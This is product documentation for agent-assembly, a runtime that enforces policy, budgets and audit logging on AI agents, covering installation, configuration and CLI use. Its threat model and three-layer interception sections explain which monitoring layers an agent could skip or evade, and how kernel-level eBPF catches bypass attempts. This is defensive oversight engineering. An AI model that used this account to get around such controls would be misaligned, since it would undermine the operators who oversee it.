agent-assembly

agent-assembly is the open-source core of the AI Agent Assembly governance platform. It enforces policy on AI agents — what they may call, spend, and connect to — and records every decision in an immutable audit trail.

This book is the contributor and operator reference for the core. If you build with a language SDK instead, read the per-SDK guides below.

New here? Start with the Introduction — it explains what Agent Assembly is, the problem it solves, the core concepts, and the three-layer interception model. Then move on to the Quick Start.

Other docs: Docs Hub · Python SDK · Node SDK · Go SDK

Run it locally

Point the gateway at a bundled reference policy and you have a governing daemon listening on 127.0.0.1:50051:

git clone https://github.com/ai-agent-assembly/agent-assembly.git
cd agent-assembly
cargo run -p aa-gateway -- --policy policy-examples/low-risk.yaml

From there, attach an SDK shim, the aa-proxy sidecar, or the eBPF layer to start intercepting agent actions. The Architecture chapter explains how those three layers fit together.

Where to go next

You want to…	Read
Understand what this is and why	Introduction
Get a gateway running quickly	Quick Start
Look up an `aasm` command	CLI Reference
Follow a task end-to-end	Usage Guide
Understand the threat model and defenses	Security Model
See how the crates fit together	Architecture
Check which SDK versions are compatible	Compatibility matrix
Read the wire-protocol contract	Protocol changelog
See latency and build-time numbers	Benchmarks — baseline

Audience

This book targets contributors and operators of agent-assembly. SDK users (Python, TypeScript, Go) should refer to the per-SDK guides in the sibling repositories.

Diagram rendering

This book renders Mermaid diagrams via the mdbook-mermaid preprocessor:

graph LR
    SDK[SDK shim] --> Gateway[aa-gateway]
    Proxy[aa-proxy] --> Gateway
    eBPF[aa-ebpf] --> Gateway
    Gateway --> Audit[(Audit log)]

Introduction

agent-assembly is a governance and security runtime for AI agents. It sits between an agent and the tools, models, and networks it reaches for, evaluates every action against policy and budget, and records the outcome in an immutable audit trail. It is the open-source core of the AI Agent Assembly platform.

This section is the place to start. It explains what the runtime is and the problem it solves, defines the handful of core concepts the rest of the book assumes, and gives a teaser of the three-layer interception model that lets the runtime see what an agent does no matter how the agent is built.

Read the pages in order:

Page	What it covers
What it is & the problem	What Agent Assembly governs, why ungoverned agent tool-use is risky, and the value proposition.
Core concepts	Agents, policies, budgets, audit — the vocabulary used throughout the book.
The three-layer model	How the SDK, sidecar proxy, and eBPF layers compose so nothing slips through.

When you are ready to run something, jump to the Quick Start. For the security rationale behind the design, read the Security Model; for the crate-level implementation, read Architecture.

What Agent Assembly is & the problem

In plain terms. AI agents act on their own — they run tools, call services, and spend money to get a job done. Agent Assembly is the set of guardrails around them: it checks every action an agent tries to take against rules you define, allows or blocks it before it happens, and keeps a permanent record of what was decided. Think of it as a security checkpoint that an AI agent cannot walk around.

It is for the people responsible for those agents — developers wiring them up, security and operations teams keeping them safe, and the planners who need to know the controls exist. With it you can decide which tools an agent may use, stop it from leaking data or overspending, and review exactly what every agent did and why.

What it is

agent-assembly is a governance-native runtime for AI agents. An AI agent — an LLM wired up to tools, APIs, shells, and network access — is given a goal and then decides, on its own, which actions to take to reach it. Agent Assembly governs those actions. Every time an agent tries to call a tool, reach the network, or spend money on a model call, the runtime evaluates that action against a policy and a budget, returns allow or deny before the action runs, and writes an immutable audit record of the decision.

A governing gateway, pointed at a reference policy, is one command away:

cargo run -p aa-gateway -- --policy policy-examples/low-risk.yaml

That daemon listens on 127.0.0.1:50051 and is ready for any interception layer to connect. The rest of this book explains how to put it to work.

The problem: ungoverned agent tool-use is risky

A traditional program does exactly what its code says. An AI agent does not. It plans its own steps at runtime, so the set of actions it might take is open-ended and not knowable in advance. The moment you give an agent real capabilities — the ability to run shell commands, hit internal APIs, call third-party services, read files, or pay for tokens — that open-endedness becomes a concrete risk:

Unbounded tool-use. An agent can invoke any tool it has been handed, in any order, with any arguments it constructs. A prompt-injected or simply confused agent may call a destructive tool it was never meant to use.
Data exfiltration. An agent that can both read sensitive data and reach the network can leak that data — intentionally coerced by an attacker, or by accident — over an outbound request. Secrets and credentials are the highest-value target.
Runaway spend. Agents loop. A planning loop that retries, fans out, or gets stuck can burn through an LLM budget in minutes with no natural stopping point.
No accountability. When an agent does something it should not have, teams need to answer what did it do, when, and was it allowed? Without a tamper- evident record of every decision, that question has no answer.
Bypass. Controls that live only inside the agent’s own code are only as trustworthy as the agent. An agent that skips the SDK, or is compromised, slips past anything that depended on its cooperation.

These risks are not hypothetical edge cases — they are the default behavior of a capable agent with no guardrails. Restricting the model’s prompt is not enough, because the model is exactly the component you cannot fully trust.

The value proposition

Agent Assembly turns “trust the agent to behave” into “the runtime enforces what the agent may do.” It provides:

Policy enforcement at the action boundary. Allow/deny decisions are made by a central gateway before an action executes, driven by declarative policy rather than agent cooperation.
Budget control. Per-team spend is tracked and enforced; a request that would breach the budget is denied, so a runaway loop is stopped, not just reported after the fact.
An immutable audit trail. Every decision — allow and deny alike — is recorded, giving teams a complete, tamper-evident account of agent behavior for debugging, incident response, and compliance.
Defense that does not depend on the agent. Enforcement is layered across three independent interception points (see the three-layer model), so governance holds even when an agent skips its SDK or actively tries to evade it.

Crucially, the agent does not have to cooperate. The whole point is that governance is enforced around the agent, by infrastructure the agent does not control. The Security Model section makes the trust boundaries explicit.

Who this book is for

This book is the reference for contributors and operators of the agent-assembly core — people running the gateway, writing policy, and deploying the interception layers. If you are instead building an application with a language SDK, start from the per-SDK guides: Python SDK, Node SDK, Go SDK.

Last updated: 2026-06-12 by Chisanan232

Core concepts

Four concepts recur throughout this book. Understanding them here makes every later chapter easier to read.

Agent

An agent is the workload being governed: an LLM-driven program that decides, at runtime, which actions to take to accomplish a goal. From the runtime’s point of view an agent is an identity that performs actions — calling a tool, making an LLM request, or reaching out over the network. Agents register with the gateway and are organized under a team and an org, which is the scope at which policy and budget are applied.

Each governed action is described by an action type (for example, a tool call or an LLM call), a target (what it is acting on), and a set of labels (metadata used by policy rules). This is the unit the runtime makes a decision about.

Policy

A policy is a declarative document — written in YAML or TOML — that states what agents are and are not allowed to do. Rules match on the action type, target, and labels of a request and resolve to allow or deny.

Policies are scoped and they cascade. Rules can be attached at the org, team, agent, and tool levels; when an action is evaluated, the gateway walks those scopes and merges them with a most-restrictive-wins rule, so a broad organizational deny cannot be loosened by a narrower scope. Policy is evaluated server-side, in the gateway — never by the agent or a dashboard — so the decision cannot be tampered with by the workload it governs. The reference policies under policy-examples/ are a good starting point. The detailed evaluation path is documented in Architecture.

Budget

A budget caps how much a team may spend on agent activity, primarily the cost of LLM calls. The gateway tracks consumption per team against a cost model and treats the budget as part of the policy decision: a request that would breach the budget is downgraded from allow to deny. This makes budget a hard guardrail that stops runaway spend in the moment, rather than a billing report that arrives after the money is gone.

Audit

The audit trail is the immutable, append-only record of every decision the gateway makes — both allows and denies — together with the action that prompted it. Because it is tamper-evident and complete, it answers the accountability question for any agent: what did it do, when, and was it permitted? Audit records use a single wire format regardless of which interception layer observed the action, so the gateway presents one unified history. Audit data underpins debugging, incident response, and compliance export.

With these four in hand — agents perform actions, policy decides allow/deny, budget caps spend, and audit records everything — the three- layer interception model explains how the runtime actually sees an agent’s actions in order to govern them.

Last updated: 2026-06-11 by Chisanan232

The three-layer interception model at a glance

To govern an action, the runtime first has to see it. Agent Assembly intercepts agent actions at three independent layers, each catching what the layers above it might miss, and routes every observed action to one central gateway for a decision. This page is a teaser; the Security Model covers why the layers are arranged this way and what each defends against, and Architecture covers how each is implemented.

The three layers

The layers are ordered by a deliberate trade-off — lowest latency first, highest detection authority first:

Layer	Runs in	Crate(s)	Latency	Catches	Trade-off
1 — SDK (in-process)	The agent’s own process	`aa-sdk-client` + per-language shims, `aa-wasm`	Lowest	What the SDK is wired into	Fastest path; but requires the agent to adopt the SDK, and an agent could skip it.
2 — Sidecar proxy	An adjacent process / sidecar	`aa-proxy`	Medium	Outbound HTTPS, with no code change	Catches network egress the SDK missed; sees only what is routed through it.
3 — eBPF (kernel)	The Linux kernel	`aa-ebpf` and friends	Highest cost	Everything else, including bypass attempts	Highest detection authority; Linux-only and needs elevated privileges.

The latency-vs-authority trade-off is the key idea. The in-process SDK is the cheapest place to make a decision, but it is also the easiest for an agent to avoid — it lives inside the very process you do not fully trust. The eBPF layer is the most expensive to run, but it watches from the kernel, below anything the agent can reach, so it catches actions the higher layers never saw — including deliberate attempts to bypass the SDK.

How they compose

The layers are not alternatives; they stack. A deployment runs whatever subset fits its constraints, and because every layer reports to the same gateway using the same audit wire format, the gateway sees one unified view no matter which layers produced the events. Coverage is the union of the layers you deploy: the SDK handles the fast common path, the proxy backstops network egress without touching agent code, and eBPF is the floor that catches what slips past both. Run all three and an action has nowhere to hide.

graph TD
    classDef agent fill:#eef2ff,stroke:#6366f1
    classDef l1 fill:#eaf6ee,stroke:#3aa55b
    classDef l2 fill:#fff3d6,stroke:#c98a00
    classDef l3 fill:#fdecea,stroke:#d75748
    classDef gw fill:#e8f1ff,stroke:#5b8def

    Agent["AI agent<br/>(tool / LLM / network calls)"]:::agent

    subgraph Interception["Three interception layers"]
        L1["Layer 1 — SDK shim<br/>in-process · lowest latency"]:::l1
        L2["Layer 2 — Sidecar proxy<br/>aa-proxy · outbound HTTPS"]:::l2
        L3["Layer 3 — eBPF<br/>kernel · highest authority"]:::l3
    end

    GW["Gateway (aa-gateway)<br/>policy · budget · decision"]:::gw
    Audit[("Immutable audit log")]

    Agent -->|"action"| L1
    Agent -.->|"network egress"| L2
    Agent -.->|"syscalls / TLS"| L3

    L1 -->|"allow / deny request"| GW
    L2 -->|"allow / deny request"| GW
    L3 -->|"audit-only events"| GW

    GW -->|"ALLOW / DENY"| Agent
    GW --> Audit

The gateway is the single brain behind all three: it holds the agent registry, evaluates policy, enforces budgets, and appends the audit record before answering allow or deny.

Where to go next

Security Model — the threat model and why this layered defense closes the gaps, including what each layer is and is not trusted to do.
Architecture — the crate-level how: the gateway, the policy engine, the transports, and the full interception data flow.

Last updated: 2026-06-11 by Chisanan232

Requirements

Before you install Agent Assembly, make sure your machine meets the prerequisites below. The CLI and the governing gateway run on macOS and Linux; only the kernel-level eBPF interception layer is Linux-only.

At a glance

You want to…	You need
Install and run the `aasm` CLI from a release	A supported OS (macOS or Linux) — nothing else
Build the workspace from source	Rust stable ≥ 1.75, `protoc`, and a C toolchain
Run the SDK or sidecar-proxy interception layers	macOS or Linux
Run the eBPF interception layer	Linux only — a recent kernel with BTF and a nightly Rust toolchain

Supported platforms

The three interception layers have different platform reach. The SDK shim and the sidecar proxy (aa-proxy) run anywhere the runtime builds; kernel-level eBPF interception is Linux-only.

Platform	Runtime / CLI	Sidecar proxy (`aa-proxy`)	eBPF interception
Linux (x86_64 / arm64)	✅	✅	✅ — kernel with BTF + nightly toolchain
macOS (Apple Silicon / Intel)	✅	✅	❌ — Linux-only
Windows	⚠️ via WSL2	⚠️ via WSL2	⚠️ via WSL2

On macOS, governance is enforced through the SDK and proxy layers; the eBPF layer is unavailable. See aa-ebpf/README.md for kernel requirements.

Installing the CLI only

If you just want the aasm operator CLI from a published release, you need nothing more than a supported OS. The quick-install script downloads a pre-built binary for x86_64/aarch64 on macOS (apple-darwin) and Linux (unknown-linux-gnu). Jump straight to Installation.

Building from source

To build the Cargo workspace yourself — for development, or to run the gateway via cargo run — install the following.

Required

Rust stable, ≥ 1.75 — install via rustup. The workspace uses the 2021 edition.
protoc — the Protocol Buffers compiler, required by the aa-proto and aa-gateway build scripts.
- macOS: brew install protobuf
- Debian / Ubuntu: apt-get install protobuf-compiler

Recommended developer tooling

These are not needed to run the CLI but are used by the test and contribution workflow:

cargo-nextest — the test runner used across the workspace.
cargo-deny — dependency and license checks.
Lefthook — git pre-commit / pre-push hooks.

Linux-only build dependencies

On Linux, the native-TLS path in aa-proxy additionally requires:

pkg-config
libssl-dev (Debian/Ubuntu) or openssl-devel (RHEL-family)

Requirements per interception layer

Each interception layer can be deployed independently. Pick the layers you need and install only their requirements.

Layer	What it does	Requirements
SDK shim (in-process)	Fastest path; the agent adopts a language SDK that reports to the gateway	The relevant SDK: python-sdk, node-sdk, or go-sdk. Runs on macOS or Linux.
Sidecar proxy (`aa-proxy`)	Intercepts outbound HTTPS via MitM with a per-host CA — no code changes	macOS or Linux. On Linux, `pkg-config` + `libssl-dev`/`openssl-devel`.
eBPF (kernel)	Catches everything else, including bypass attempts	Linux only. A recent kernel with BTF enabled and a nightly Rust toolchain to build the BPF-target crates. Not available on macOS.

The eBPF caveat. The aa-ebpf-probes and aa-ebpf-programs crates compile for the bpfel-unknown-none target and are intentionally outside the host Cargo workspace. They cannot be selected with cargo -p and do not build on macOS. If you are on macOS, you can still run and govern agents through the SDK and proxy layers — you simply do not get the kernel-level layer.

With the prerequisites in place, continue to Installation.

Last updated: 2026-06-11 by Chisanan232

Installation

This page covers every supported way to get the aasm CLI onto your machine, then how to verify it works. Pick one method:

Method	Best for	Needs a published release?
Quick-install script	Fast, reproducible install on macOS / Linux	Yes
Homebrew tap	macOS / Linux users who already use Homebrew	Yes
Pre-built binaries	Air-gapped or scripted installs, custom verification	Yes
`cargo install` / from source	Contributors and bleeding-edge builds	No

Alpha note. Agent Assembly is in the v0.0.1 pre-release series; published releases are GitHub pre-releases. The public API and wire protocol are not yet stable — do not use in production.

Quick-install script

The one-line installer downloads the matching pre-built tarball plus its SHA256SUMS file from the GitHub Release, verifies the checksum, and installs the aasm binary:

curl -sSf https://raw.githubusercontent.com/ai-agent-assembly/agent-assembly/master/scripts/install-cli.sh | sh

By default the binary is installed to /usr/local/bin if that directory is writable, otherwise to ~/.local/bin (always user-writable, no sudo needed). The installer script lives in the repo at scripts/install-cli.sh.

A short hosted alias (https://install.ai-agent-assembly.dev — hosted install script, coming soon) is planned but not yet live — use the raw.githubusercontent.com URL above for now.

If the install directory is not on your PATH, the script prints the line to add to your shell profile, for example:

export PATH="$HOME/.local/bin:$PATH"

Pin a version or change the install directory

The installer honors these environment variables:

# Install a specific release tag (default: latest)
AASM_VERSION=v0.0.1-alpha.5 curl -sSf https://raw.githubusercontent.com/ai-agent-assembly/agent-assembly/master/scripts/install-cli.sh | sh

# Install to a custom directory
AASM_INSTALL_DIR=/usr/local/bin curl -sSf https://raw.githubusercontent.com/ai-agent-assembly/agent-assembly/master/scripts/install-cli.sh | sh

Variable	Default	Purpose
`AASM_INSTALL_DIR`	`/usr/local/bin` or `~/.local/bin`	Installation directory
`AASM_VERSION`	latest	Specific release tag to install
`AASM_REQUIRE_SIGNATURE`	`0`	When `1`, a missing cosign signature aborts the install (see below)
`AASM_NO_MODIFY_PATH`	`0`	When `1`, suppress the `PATH` hint

Supply-chain verification (checksum + cosign)

The installer always enforces a SHA-256 checksum: it downloads SHA256SUMS and aborts if the tarball’s hash does not match. The checksum file itself is additionally signed with cosign (keyless, via GitHub OIDC — Fulcio cert + Rekor log). If cosign is installed locally, the installer verifies that signature against the release workflow’s identity before trusting the checksums. To make a missing/unverifiable signature fatal:

AASM_REQUIRE_SIGNATURE=1 curl -sSf https://raw.githubusercontent.com/ai-agent-assembly/agent-assembly/master/scripts/install-cli.sh | sh

Releases published before signing was added carry no cosign bundle; with the default AASM_REQUIRE_SIGNATURE=0 the installer warns and falls back to checksum-only (the SHA-256 check is never skipped).

Homebrew (macOS / Linux)

Install the latest tagged aasm release from the Homebrew tap:

brew install ai-agent-assembly/homebrew-agent-assembly/aasm

Pre-built binaries (manual)

Each GitHub Release publishes per-platform tarballs plus a SHA256SUMS file and a SHA256SUMS.cosign.bundle signature. Tarballs are named aasm-<arch>-<os>.tar.gz, where <arch> is x86_64 or aarch64 and <os> is apple-darwin (macOS) or unknown-linux-gnu (Linux).

To install and verify by hand:

VERSION=v0.0.1-alpha.5
ASSET=aasm-aarch64-apple-darwin.tar.gz   # adjust for your platform
BASE="https://github.com/ai-agent-assembly/agent-assembly/releases/download/${VERSION}"

curl -sSfL "${BASE}/${ASSET}"        -o "${ASSET}"
curl -sSfL "${BASE}/SHA256SUMS"      -o SHA256SUMS

# Verify the checksum (use sha256sum on Linux, shasum -a 256 on macOS)
shasum -a 256 -c <(grep "${ASSET}" SHA256SUMS)

# (Optional) Verify the cosign signature on the checksum file
curl -sSfL "${BASE}/SHA256SUMS.cosign.bundle" -o SHA256SUMS.cosign.bundle
cosign verify-blob \
  --bundle SHA256SUMS.cosign.bundle \
  --certificate-identity-regexp '^https://github\.com/ai-agent-assembly/agent-assembly/\.github/workflows/release\.yml@refs/tags/v.*$' \
  --certificate-oidc-issuer 'https://token.actions.githubusercontent.com' \
  SHA256SUMS

tar -xzf "${ASSET}" aasm
install -m755 aasm ~/.local/bin/aasm

Build from source

Contributors and anyone who wants the bleeding edge can build from the Cargo workspace. This needs the build prerequisites (Rust ≥ 1.75 and protoc).

git clone https://github.com/ai-agent-assembly/agent-assembly.git
cd agent-assembly
cargo build -p aa-cli            # produces ./target/debug/aasm

The compiled binary is at ./target/debug/aasm. Add it to your PATH or run it by path. You can also install it onto your PATH with Cargo:

cargo install --path aa-cli      # installs `aasm` into ~/.cargo/bin

The eBPF-target crates (aa-ebpf-probes, aa-ebpf-programs) are intentionally outside the workspace and are not built by cargo build -p aa-cli. See Requirements.

Verify the install

Confirm the binary is on your PATH and runs:

$ aasm --version
aasm 0.0.1-alpha.5

A fuller report — the CLI version plus whether a gateway and API are reachable — comes from aasm version. With no control plane running yet, both report unreachable, which is expected at this point:

$ aasm version
+-----------+---------------+-------------+
| COMPONENT | VERSION       | STATUS      |
+=========================================+
| cli       | 0.0.1-alpha.5 | -           |
|-----------+---------------+-------------|
| gateway   | -             | unreachable |
|-----------+---------------+-------------|
| api       | -             | unreachable |
+-----------+---------------+-------------+

List the available commands with aasm --help:

$ aasm --help
aasm — command-line tool for Agent Assembly

Usage: aasm [OPTIONS] <COMMAND>

Commands:
  admin       Gateway administrative operations
  agent       Manage monitored agent processes
  alerts      Manage governance alerts
  audit       Query audit log entries and export compliance reports
  ...
  status      Show fleet health, agents, approvals, and budget at a glance
  topology    Visualize agent topology, trees, lineage, and statistics
  gateway     Manage the aa-gateway governance daemon — agent registry, policy engine, audit log
  start       Start the locally-managed Agent Assembly gateway process
  version     Show CLI and gateway version information
  ...

Troubleshooting

Symptom	Cause	Fix
`aasm: command not found`	Install dir not on `PATH`	Add the install dir to `PATH` (the installer prints the exact line)
`could not determine latest release`	The repo has no published release yet, or a network/API issue	Pin a tag with `AASM_VERSION=...`, or check the releases page
`SHA256 mismatch`	Corrupted or tampered download	Re-download; do not install. Report it if it persists
`cosign signature verification FAILED`	Bad or wrong-identity signature	Do not install; report it

Now configure the CLI to talk to your gateway — see Configuration.

Last updated: 2026-06-12 by Chisanan232

Configuration

The aasm CLI works with zero configuration — if you never create a config file, it talks to a gateway API at http://localhost:8080. This page covers the config file format, named contexts (connection profiles), the environment variables the CLI reads, and the separate agent-assembly.toml runtime config the gateway consumes.

Where the CLI connects, and how it decides

Every CLI command that talks to the control plane resolves three things — the API URL, an optional API key, and an output format — from the following sources, highest priority first:

Explicit flags: --api-url, --api-key.
A named context selected with --context <name>, or the default_context from the config file.
The built-in default API URL: http://localhost:8080.

So aasm status with no flags and no config file connects to http://localhost:8080. A --api-url flag always wins over any context.

The CLI config file: `~/.aa/config.yaml`

CLI configuration lives at ~/.aa/config.yaml. The file is optional; if it is absent the CLI uses defaults. Its schema:

# Name of the context used when --context is not given (optional).
default_context: local

# Named connection profiles. Each has an api_url and an optional api_key.
contexts:
  local:
    api_url: http://localhost:8080
  production:
    api_url: https://api.example.com
    api_key: secret123        # optional; omit for unauthenticated endpoints

# Settings for `aasm dashboard start` (optional; shown with defaults).
dashboard:
  port: 3000
  auto_open: false

Key	Type	Default	Purpose
`default_context`	string	(none)	Context used when `--context` is not passed
`contexts.<name>.api_url`	string	—	Base URL of the gateway API for this context
`contexts.<name>.api_key`	string	(none)	Bearer token sent with requests for this context
`dashboard.port`	integer	`3000`	Port the embedded dashboard SPA server listens on
`dashboard.auto_open`	bool	`false`	Open the browser automatically after the dashboard is ready

Named contexts (connection profiles)

A context is a named API URL + key, so you can switch between, say, a local gateway and a hosted one without retyping flags. Manage contexts with aasm context; the commands read and write ~/.aa/config.yaml for you.

Create or update contexts:

$ aasm context set local --api-url http://localhost:8080
Context 'local' saved.

$ aasm context set production --api-url https://api.example.com --api-key secret123
Context 'production' saved.

Choose the default context:

$ aasm context use local
Switched to context 'local'.

List them (the * marks the default; keys are never printed, only flagged as set):

$ aasm context list
local *  http://localhost:8080
production  https://api.example.com (key set)

Once a default is set, every command uses it. Override per-invocation with --context:

aasm status                       # uses default context (local)
aasm status --context production  # one-off against production
aasm status --api-url http://localhost:9090   # ad-hoc URL, ignores contexts

Environment variables

The CLI reads these environment variables. Where one overlaps a flag or config value, the precedence is noted.

Variable	Used by	Precedence
`AASM_DASHBOARD_PORT`	`aasm dashboard`	Highest — beats `--port` and `dashboard.port` in config
`AASM_VERSION` / `AASM_INSTALL_DIR`	the install script	Installer only
`AA_POLICY`	`aasm gateway start`	Default policy path; overridden by `--policy`
`AA_DATA_DIR`	gateway / proxy / dashboard	Directory for PID files and managed-process state
`AA_PROXY_ADDR`	`aasm proxy start`	Proxy listen address (default `127.0.0.1:8899`)
`AA_GATEWAY_URL`	`aasm proxy start`	Gateway URL the proxy reports to
`AA_CA_DIR`	`aasm proxy`	Per-host CA material directory

Note the two prefixes: AASM_* variables configure the CLI surface, while AA_* variables configure the underlying daemons the CLI launches (gateway, proxy). They are not interchangeable.

Output format

Most list/get commands accept --output table|json|yaml (default table). Use json or yaml for scripting:

$ aasm version --output json
[
  {
    "component": "cli",
    "version": "0.0.1-alpha.5",
    "status": "-"
  },
  ...
]

Gateway runtime config: `agent-assembly.toml`

The CLI config above is about how the CLI connects. The gateway itself reads a separate runtime config — agent-assembly.toml — that selects its persistence backends. A starter file ships at the repo root as agent-assembly.toml.example:

# agent-assembly.toml — example runtime configuration
[storage]
policy_store       = "redis"
audit_sink         = "postgres"
session_store      = "redis"
credential_store   = "postgres"
rate_limit_counter = "redis"
lifecycle_store    = "postgres"

# Per-driver connection settings live under [storage.<driver-name>].
[storage.redis]
url = "redis://localhost:6379"

[storage.postgres]
url = "postgresql://localhost:5432/assembly"

Each storage kind names a driver (memory, redis, or postgres); the runtime resolves the name to a registered backend at boot, so you can switch backends without recompiling.

Validate it before you boot

Use aasm config validate to check an agent-assembly.toml (currently the [storage] section) before starting the gateway:

$ aasm config validate agent-assembly.toml.example
Config is valid: agent-assembly.toml.example

A valid file exits 0; an invalid one reports the problem and exits non-zero.

You are configured. Walk through starting a gateway and observing an agent in First run.

Last updated: 2026-06-11 by Chisanan232

First run

This walkthrough takes you from a freshly installed aasm to a running governance gateway that is ready for an agent to connect. Every command and its output below was captured from a real v0.0.1-alpha.5 build.

The flow

flowchart LR
    A["aasm gateway start<br/>--policy low-risk.yaml"] --> B["gRPC gateway<br/>127.0.0.1:50051"]
    B --> C["aasm gateway status<br/>→ running"]
    C --> D{"Connect an<br/>interception layer"}
    D -->|SDK shim| E["Agent registers<br/>via gRPC"]
    D -->|Sidecar proxy| E
    D -->|eBPF on Linux| E
    E --> F["aasm status / topology<br/>view the fleet"]
    F --> G["aasm gateway stop"]

Two endpoints, one gateway. The gateway speaks gRPC on 127.0.0.1:50051 — this is what SDK shims and the sidecar proxy connect to. The operator commands aasm status, aasm agent, and aasm topology talk to the gateway’s HTTP API on http://localhost:8080. In the OSS alpha the gRPC listener is what aasm gateway start brings up; until an HTTP API server is also serving on 8080, the HTTP-backed commands report unreachable. That is expected and called out at each step below.

1. Start the gateway

Point the gateway at one of the bundled reference policies. policy-examples/ ships low-risk.yaml, medium-risk.yaml, and high-risk.yaml; low-risk allows and audits everything, which is the easiest starting point.

$ aasm gateway start --policy policy-examples/low-risk.yaml
Gateway started on grpc://127.0.0.1:50051  (pid 74472)
Logs: /Users/you/.aasm/logs/gateway.log

This spawns aa-gateway as a detached background process listening for gRPC on 127.0.0.1:50051. (If you built from source, ensure aa-gateway is reachable — aasm gateway start looks in $PATH, ~/.cargo/bin, and ./target/{debug,release}.)

Alternative — from a source checkout without installing: the gateway can be run directly with Cargo, which is the form the rest of the book uses:
cargo run -p aa-gateway -- --policy policy-examples/low-risk.yaml
It listens on the same 127.0.0.1:50051.

2. Confirm it is running

$ aasm gateway status
Gateway: running  pid=74472  listen=127.0.0.1:50051  uptime=5s

If nothing is running you get a non-zero exit and:

$ aasm gateway status
Gateway: not running

Tail the gateway log at any time with aasm gateway logs.

3. Check overall status

aasm status gives the fleet-wide picture — gateway health, registered agents, pending approvals, and budget. It queries the HTTP API at http://localhost:8080:

$ aasm status
Agent Assembly Status
─────────────────────────────────────
  Gateway:   http://localhost:8080
  Health:    ✗ unreachable
─────────────────────────────────────

RUNTIME HEALTH
──────────────
  API:         ✗ unreachable
  Uptime:      0s
  Connections: 0
  Lag:         0 ms

ACTIVE AGENTS
─────────────
  (no agents registered)

PENDING APPROVALS
─────────────────
  Count:  0

BUDGET STATUS
─────────────
  Daily spend : $-- (no limit set)
  Date:           --
  (no per-agent data)

Error: gateway is not running. Start it with: aasm start

The unreachable health here reflects the gRPC-vs-HTTP split described above: the gRPC gateway from step 1 is up, but the HTTP API on 8080 is not being served in this OSS-only setup. Once an API server is serving on 8080 (for example through the hosted control plane, or a future OSS API server), Health flips to reachable and registered agents appear in ACTIVE AGENTS.

Add --watch to auto-refresh the display every 5 seconds, or --json for a machine-readable header suitable for scripting and CI.

4. Observe an agent

Agents register with the gateway through an interception layer — they are not created from the CLI. Wire one of the SDKs into your agent, or front it with the sidecar proxy, and point it at the gateway:

SDK shim (in-process): install python-sdk, node-sdk, or go-sdk and follow that SDK’s quickstart. The shim reports every action to the gateway over gRPC.
Sidecar proxy (no code changes): run aasm proxy start to intercept the agent’s outbound HTTPS and forward governance decisions to the gateway.
eBPF (Linux only): kernel hooks catch everything else, including bypass attempts.

A quick way to exercise the sidecar path end-to-end is the bundled Docker Compose stack, which runs aa-runtime as a sidecar against a stub agent:

cd examples/docker-compose
AA_API_KEY=dev-local-key docker compose up

The sidecar exposes the agent IPC socket at /tmp/aa-runtime-my-agent-001.sock and a readiness probe at http://localhost:8080/ready.

Once an agent is registered and the HTTP API is reachable, list the fleet:

aasm agent list          # all registered agents
aasm agent inspect <id>  # detail for one agent

Until then these commands report the API as unreachable:

$ aasm agent list
error: API request failed: error sending request for url (http://localhost:8080/api/v1/agents)

5. View the topology

aasm topology visualizes the agent fleet — trees, lineage, teams, and aggregate stats. Like aasm status, it reads the HTTP API:

aasm topology overview   # fleet-wide overview
aasm topology tree <id>  # subtree rooted at an agent
aasm topology stats      # aggregate statistics

With no reachable API it reports:

$ aasm topology overview
error: registry unreachable — check --api-url

6. Open a dashboard

For a live, interactive view there are two consoles:

Web dashboard — aasm dashboard start serves the embedded SPA at http://127.0.0.1:3000 (port configurable; see Configuration). It blocks until Ctrl-C; use aasm dashboard open to launch your browser against an already-running server.
Terminal (TUI) dashboard — aasm dashboard opens an interactive in-terminal dashboard for real-time monitoring, no browser required.

The web dashboard’s app shell looks like this after you sign in — the full governance navigation (Monitor / Control / Manage) down the left, with the approvals indicator, theme toggle, Settings, and Log out across the top:

Web dashboard app shell — the governance navigation after login

The data panels are empty here because this is the open-source local-mode gateway, which serves the SPA but not the populated data API (that lives in the hosted control plane). See Observe in the dashboard for the full picture, including the live-operations and dark-mode views.

7. Stop the gateway

When you are done, shut the gateway down cleanly (SIGTERM, escalating to SIGKILL after the timeout):

aasm gateway stop

Where to go next

CLI Reference — every aasm command and flag.
Usage Guide — govern an agent end-to-end, author policies, and set budgets.
Security Model — the threat model and the three-layer defense-in-depth rationale.

Last updated: 2026-06-12 by Chisanan232

CLI Reference — Overview

The aasm binary (crate aa-cli) is the operator front-end for Agent Assembly. It talks to a running aa-gateway over its HTTP / OpenAPI surface (default http://localhost:8080) for registry, policy, audit, approval, cost, and topology operations, and manages local daemon processes (gateway, proxy, dashboard) directly.

Invocation

aasm [OPTIONS] <COMMAND> [SUBCOMMAND] [ARGS]

Every command supports --help (-h for a one-line summary) at each layer:

aasm --help               # list all top-level commands
aasm policy --help        # list policy subcommands
aasm policy apply --help  # flags + arguments for one subcommand

Global options

These flags are defined on the root parser (aa-cli/src/lib.rs) and are global — they may be passed before the command or on any subcommand.

Flag	Type	Default	Description
`--context <CONTEXT>`	string	(default context, if any)	Named context from `~/.aa/config.yaml` to use for the API URL and key.
`--output <OUTPUT>`	`table` \| `json` \| `yaml`	`table`	Output format for list/get commands.
`--api-url <API_URL>`	string	`http://localhost:8080`	Override the gateway API base URL. Takes precedence over the resolved context.
`--api-key <API_KEY>`	string	(none)	Override the API key. Takes precedence over the context’s stored key.
`-h, --help`	flag	—	Print help.
`-V, --version`	flag	—	Print the `aasm` version.

Several commands also expose a local --output or --json flag that overrides the global --output for that command only (e.g. aasm logs --output json, aasm status --json, aasm gateway status --json). These are called out on the relevant command pages.

Output formats

--output (source: aa-cli/src/output.rs) selects how list/get commands render:

table (default) — human-readable, colorized tables via comfy-table.
json — machine-readable pretty JSON.
yaml — machine-readable YAML.

Commands that stream (aasm logs --follow, aasm approvals watch), visualize (aasm trace, aasm topology tree), or open a TUI (aasm dashboard) ignore --output where it does not apply.

Config and context resolution

CLI configuration lives at ~/.aa/config.yaml (source: aa-cli/src/config.rs). It holds named contexts (connection profiles), an optional default context, and dashboard settings:

default_context: production
contexts:
  production:
    api_url: https://api.example.com
    api_key: prod-key
  staging:
    api_url: https://staging.example.com
dashboard:
  port: 3000
  auto_open: false

The active API URL and key are resolved with this precedence (highest first):

Explicit --api-url / --api-key flags.
The named context — --context <name>, otherwise default_context.
Built-in default URL http://localhost:8080 (no key).

Manage contexts with the aasm context command group.

Note on paths. The CLI config file is ~/.aa/config.yaml. Separately, the locally-managed gateway uses ~/.aasm/ for its runtime artifacts — ~/.aasm/config.yaml (gateway config, see aasm start), ~/.aasm/policy.yaml, ~/.aasm/logs/gateway.log, and ~/.aasm/gateway.pid. These are distinct files.

Exit codes

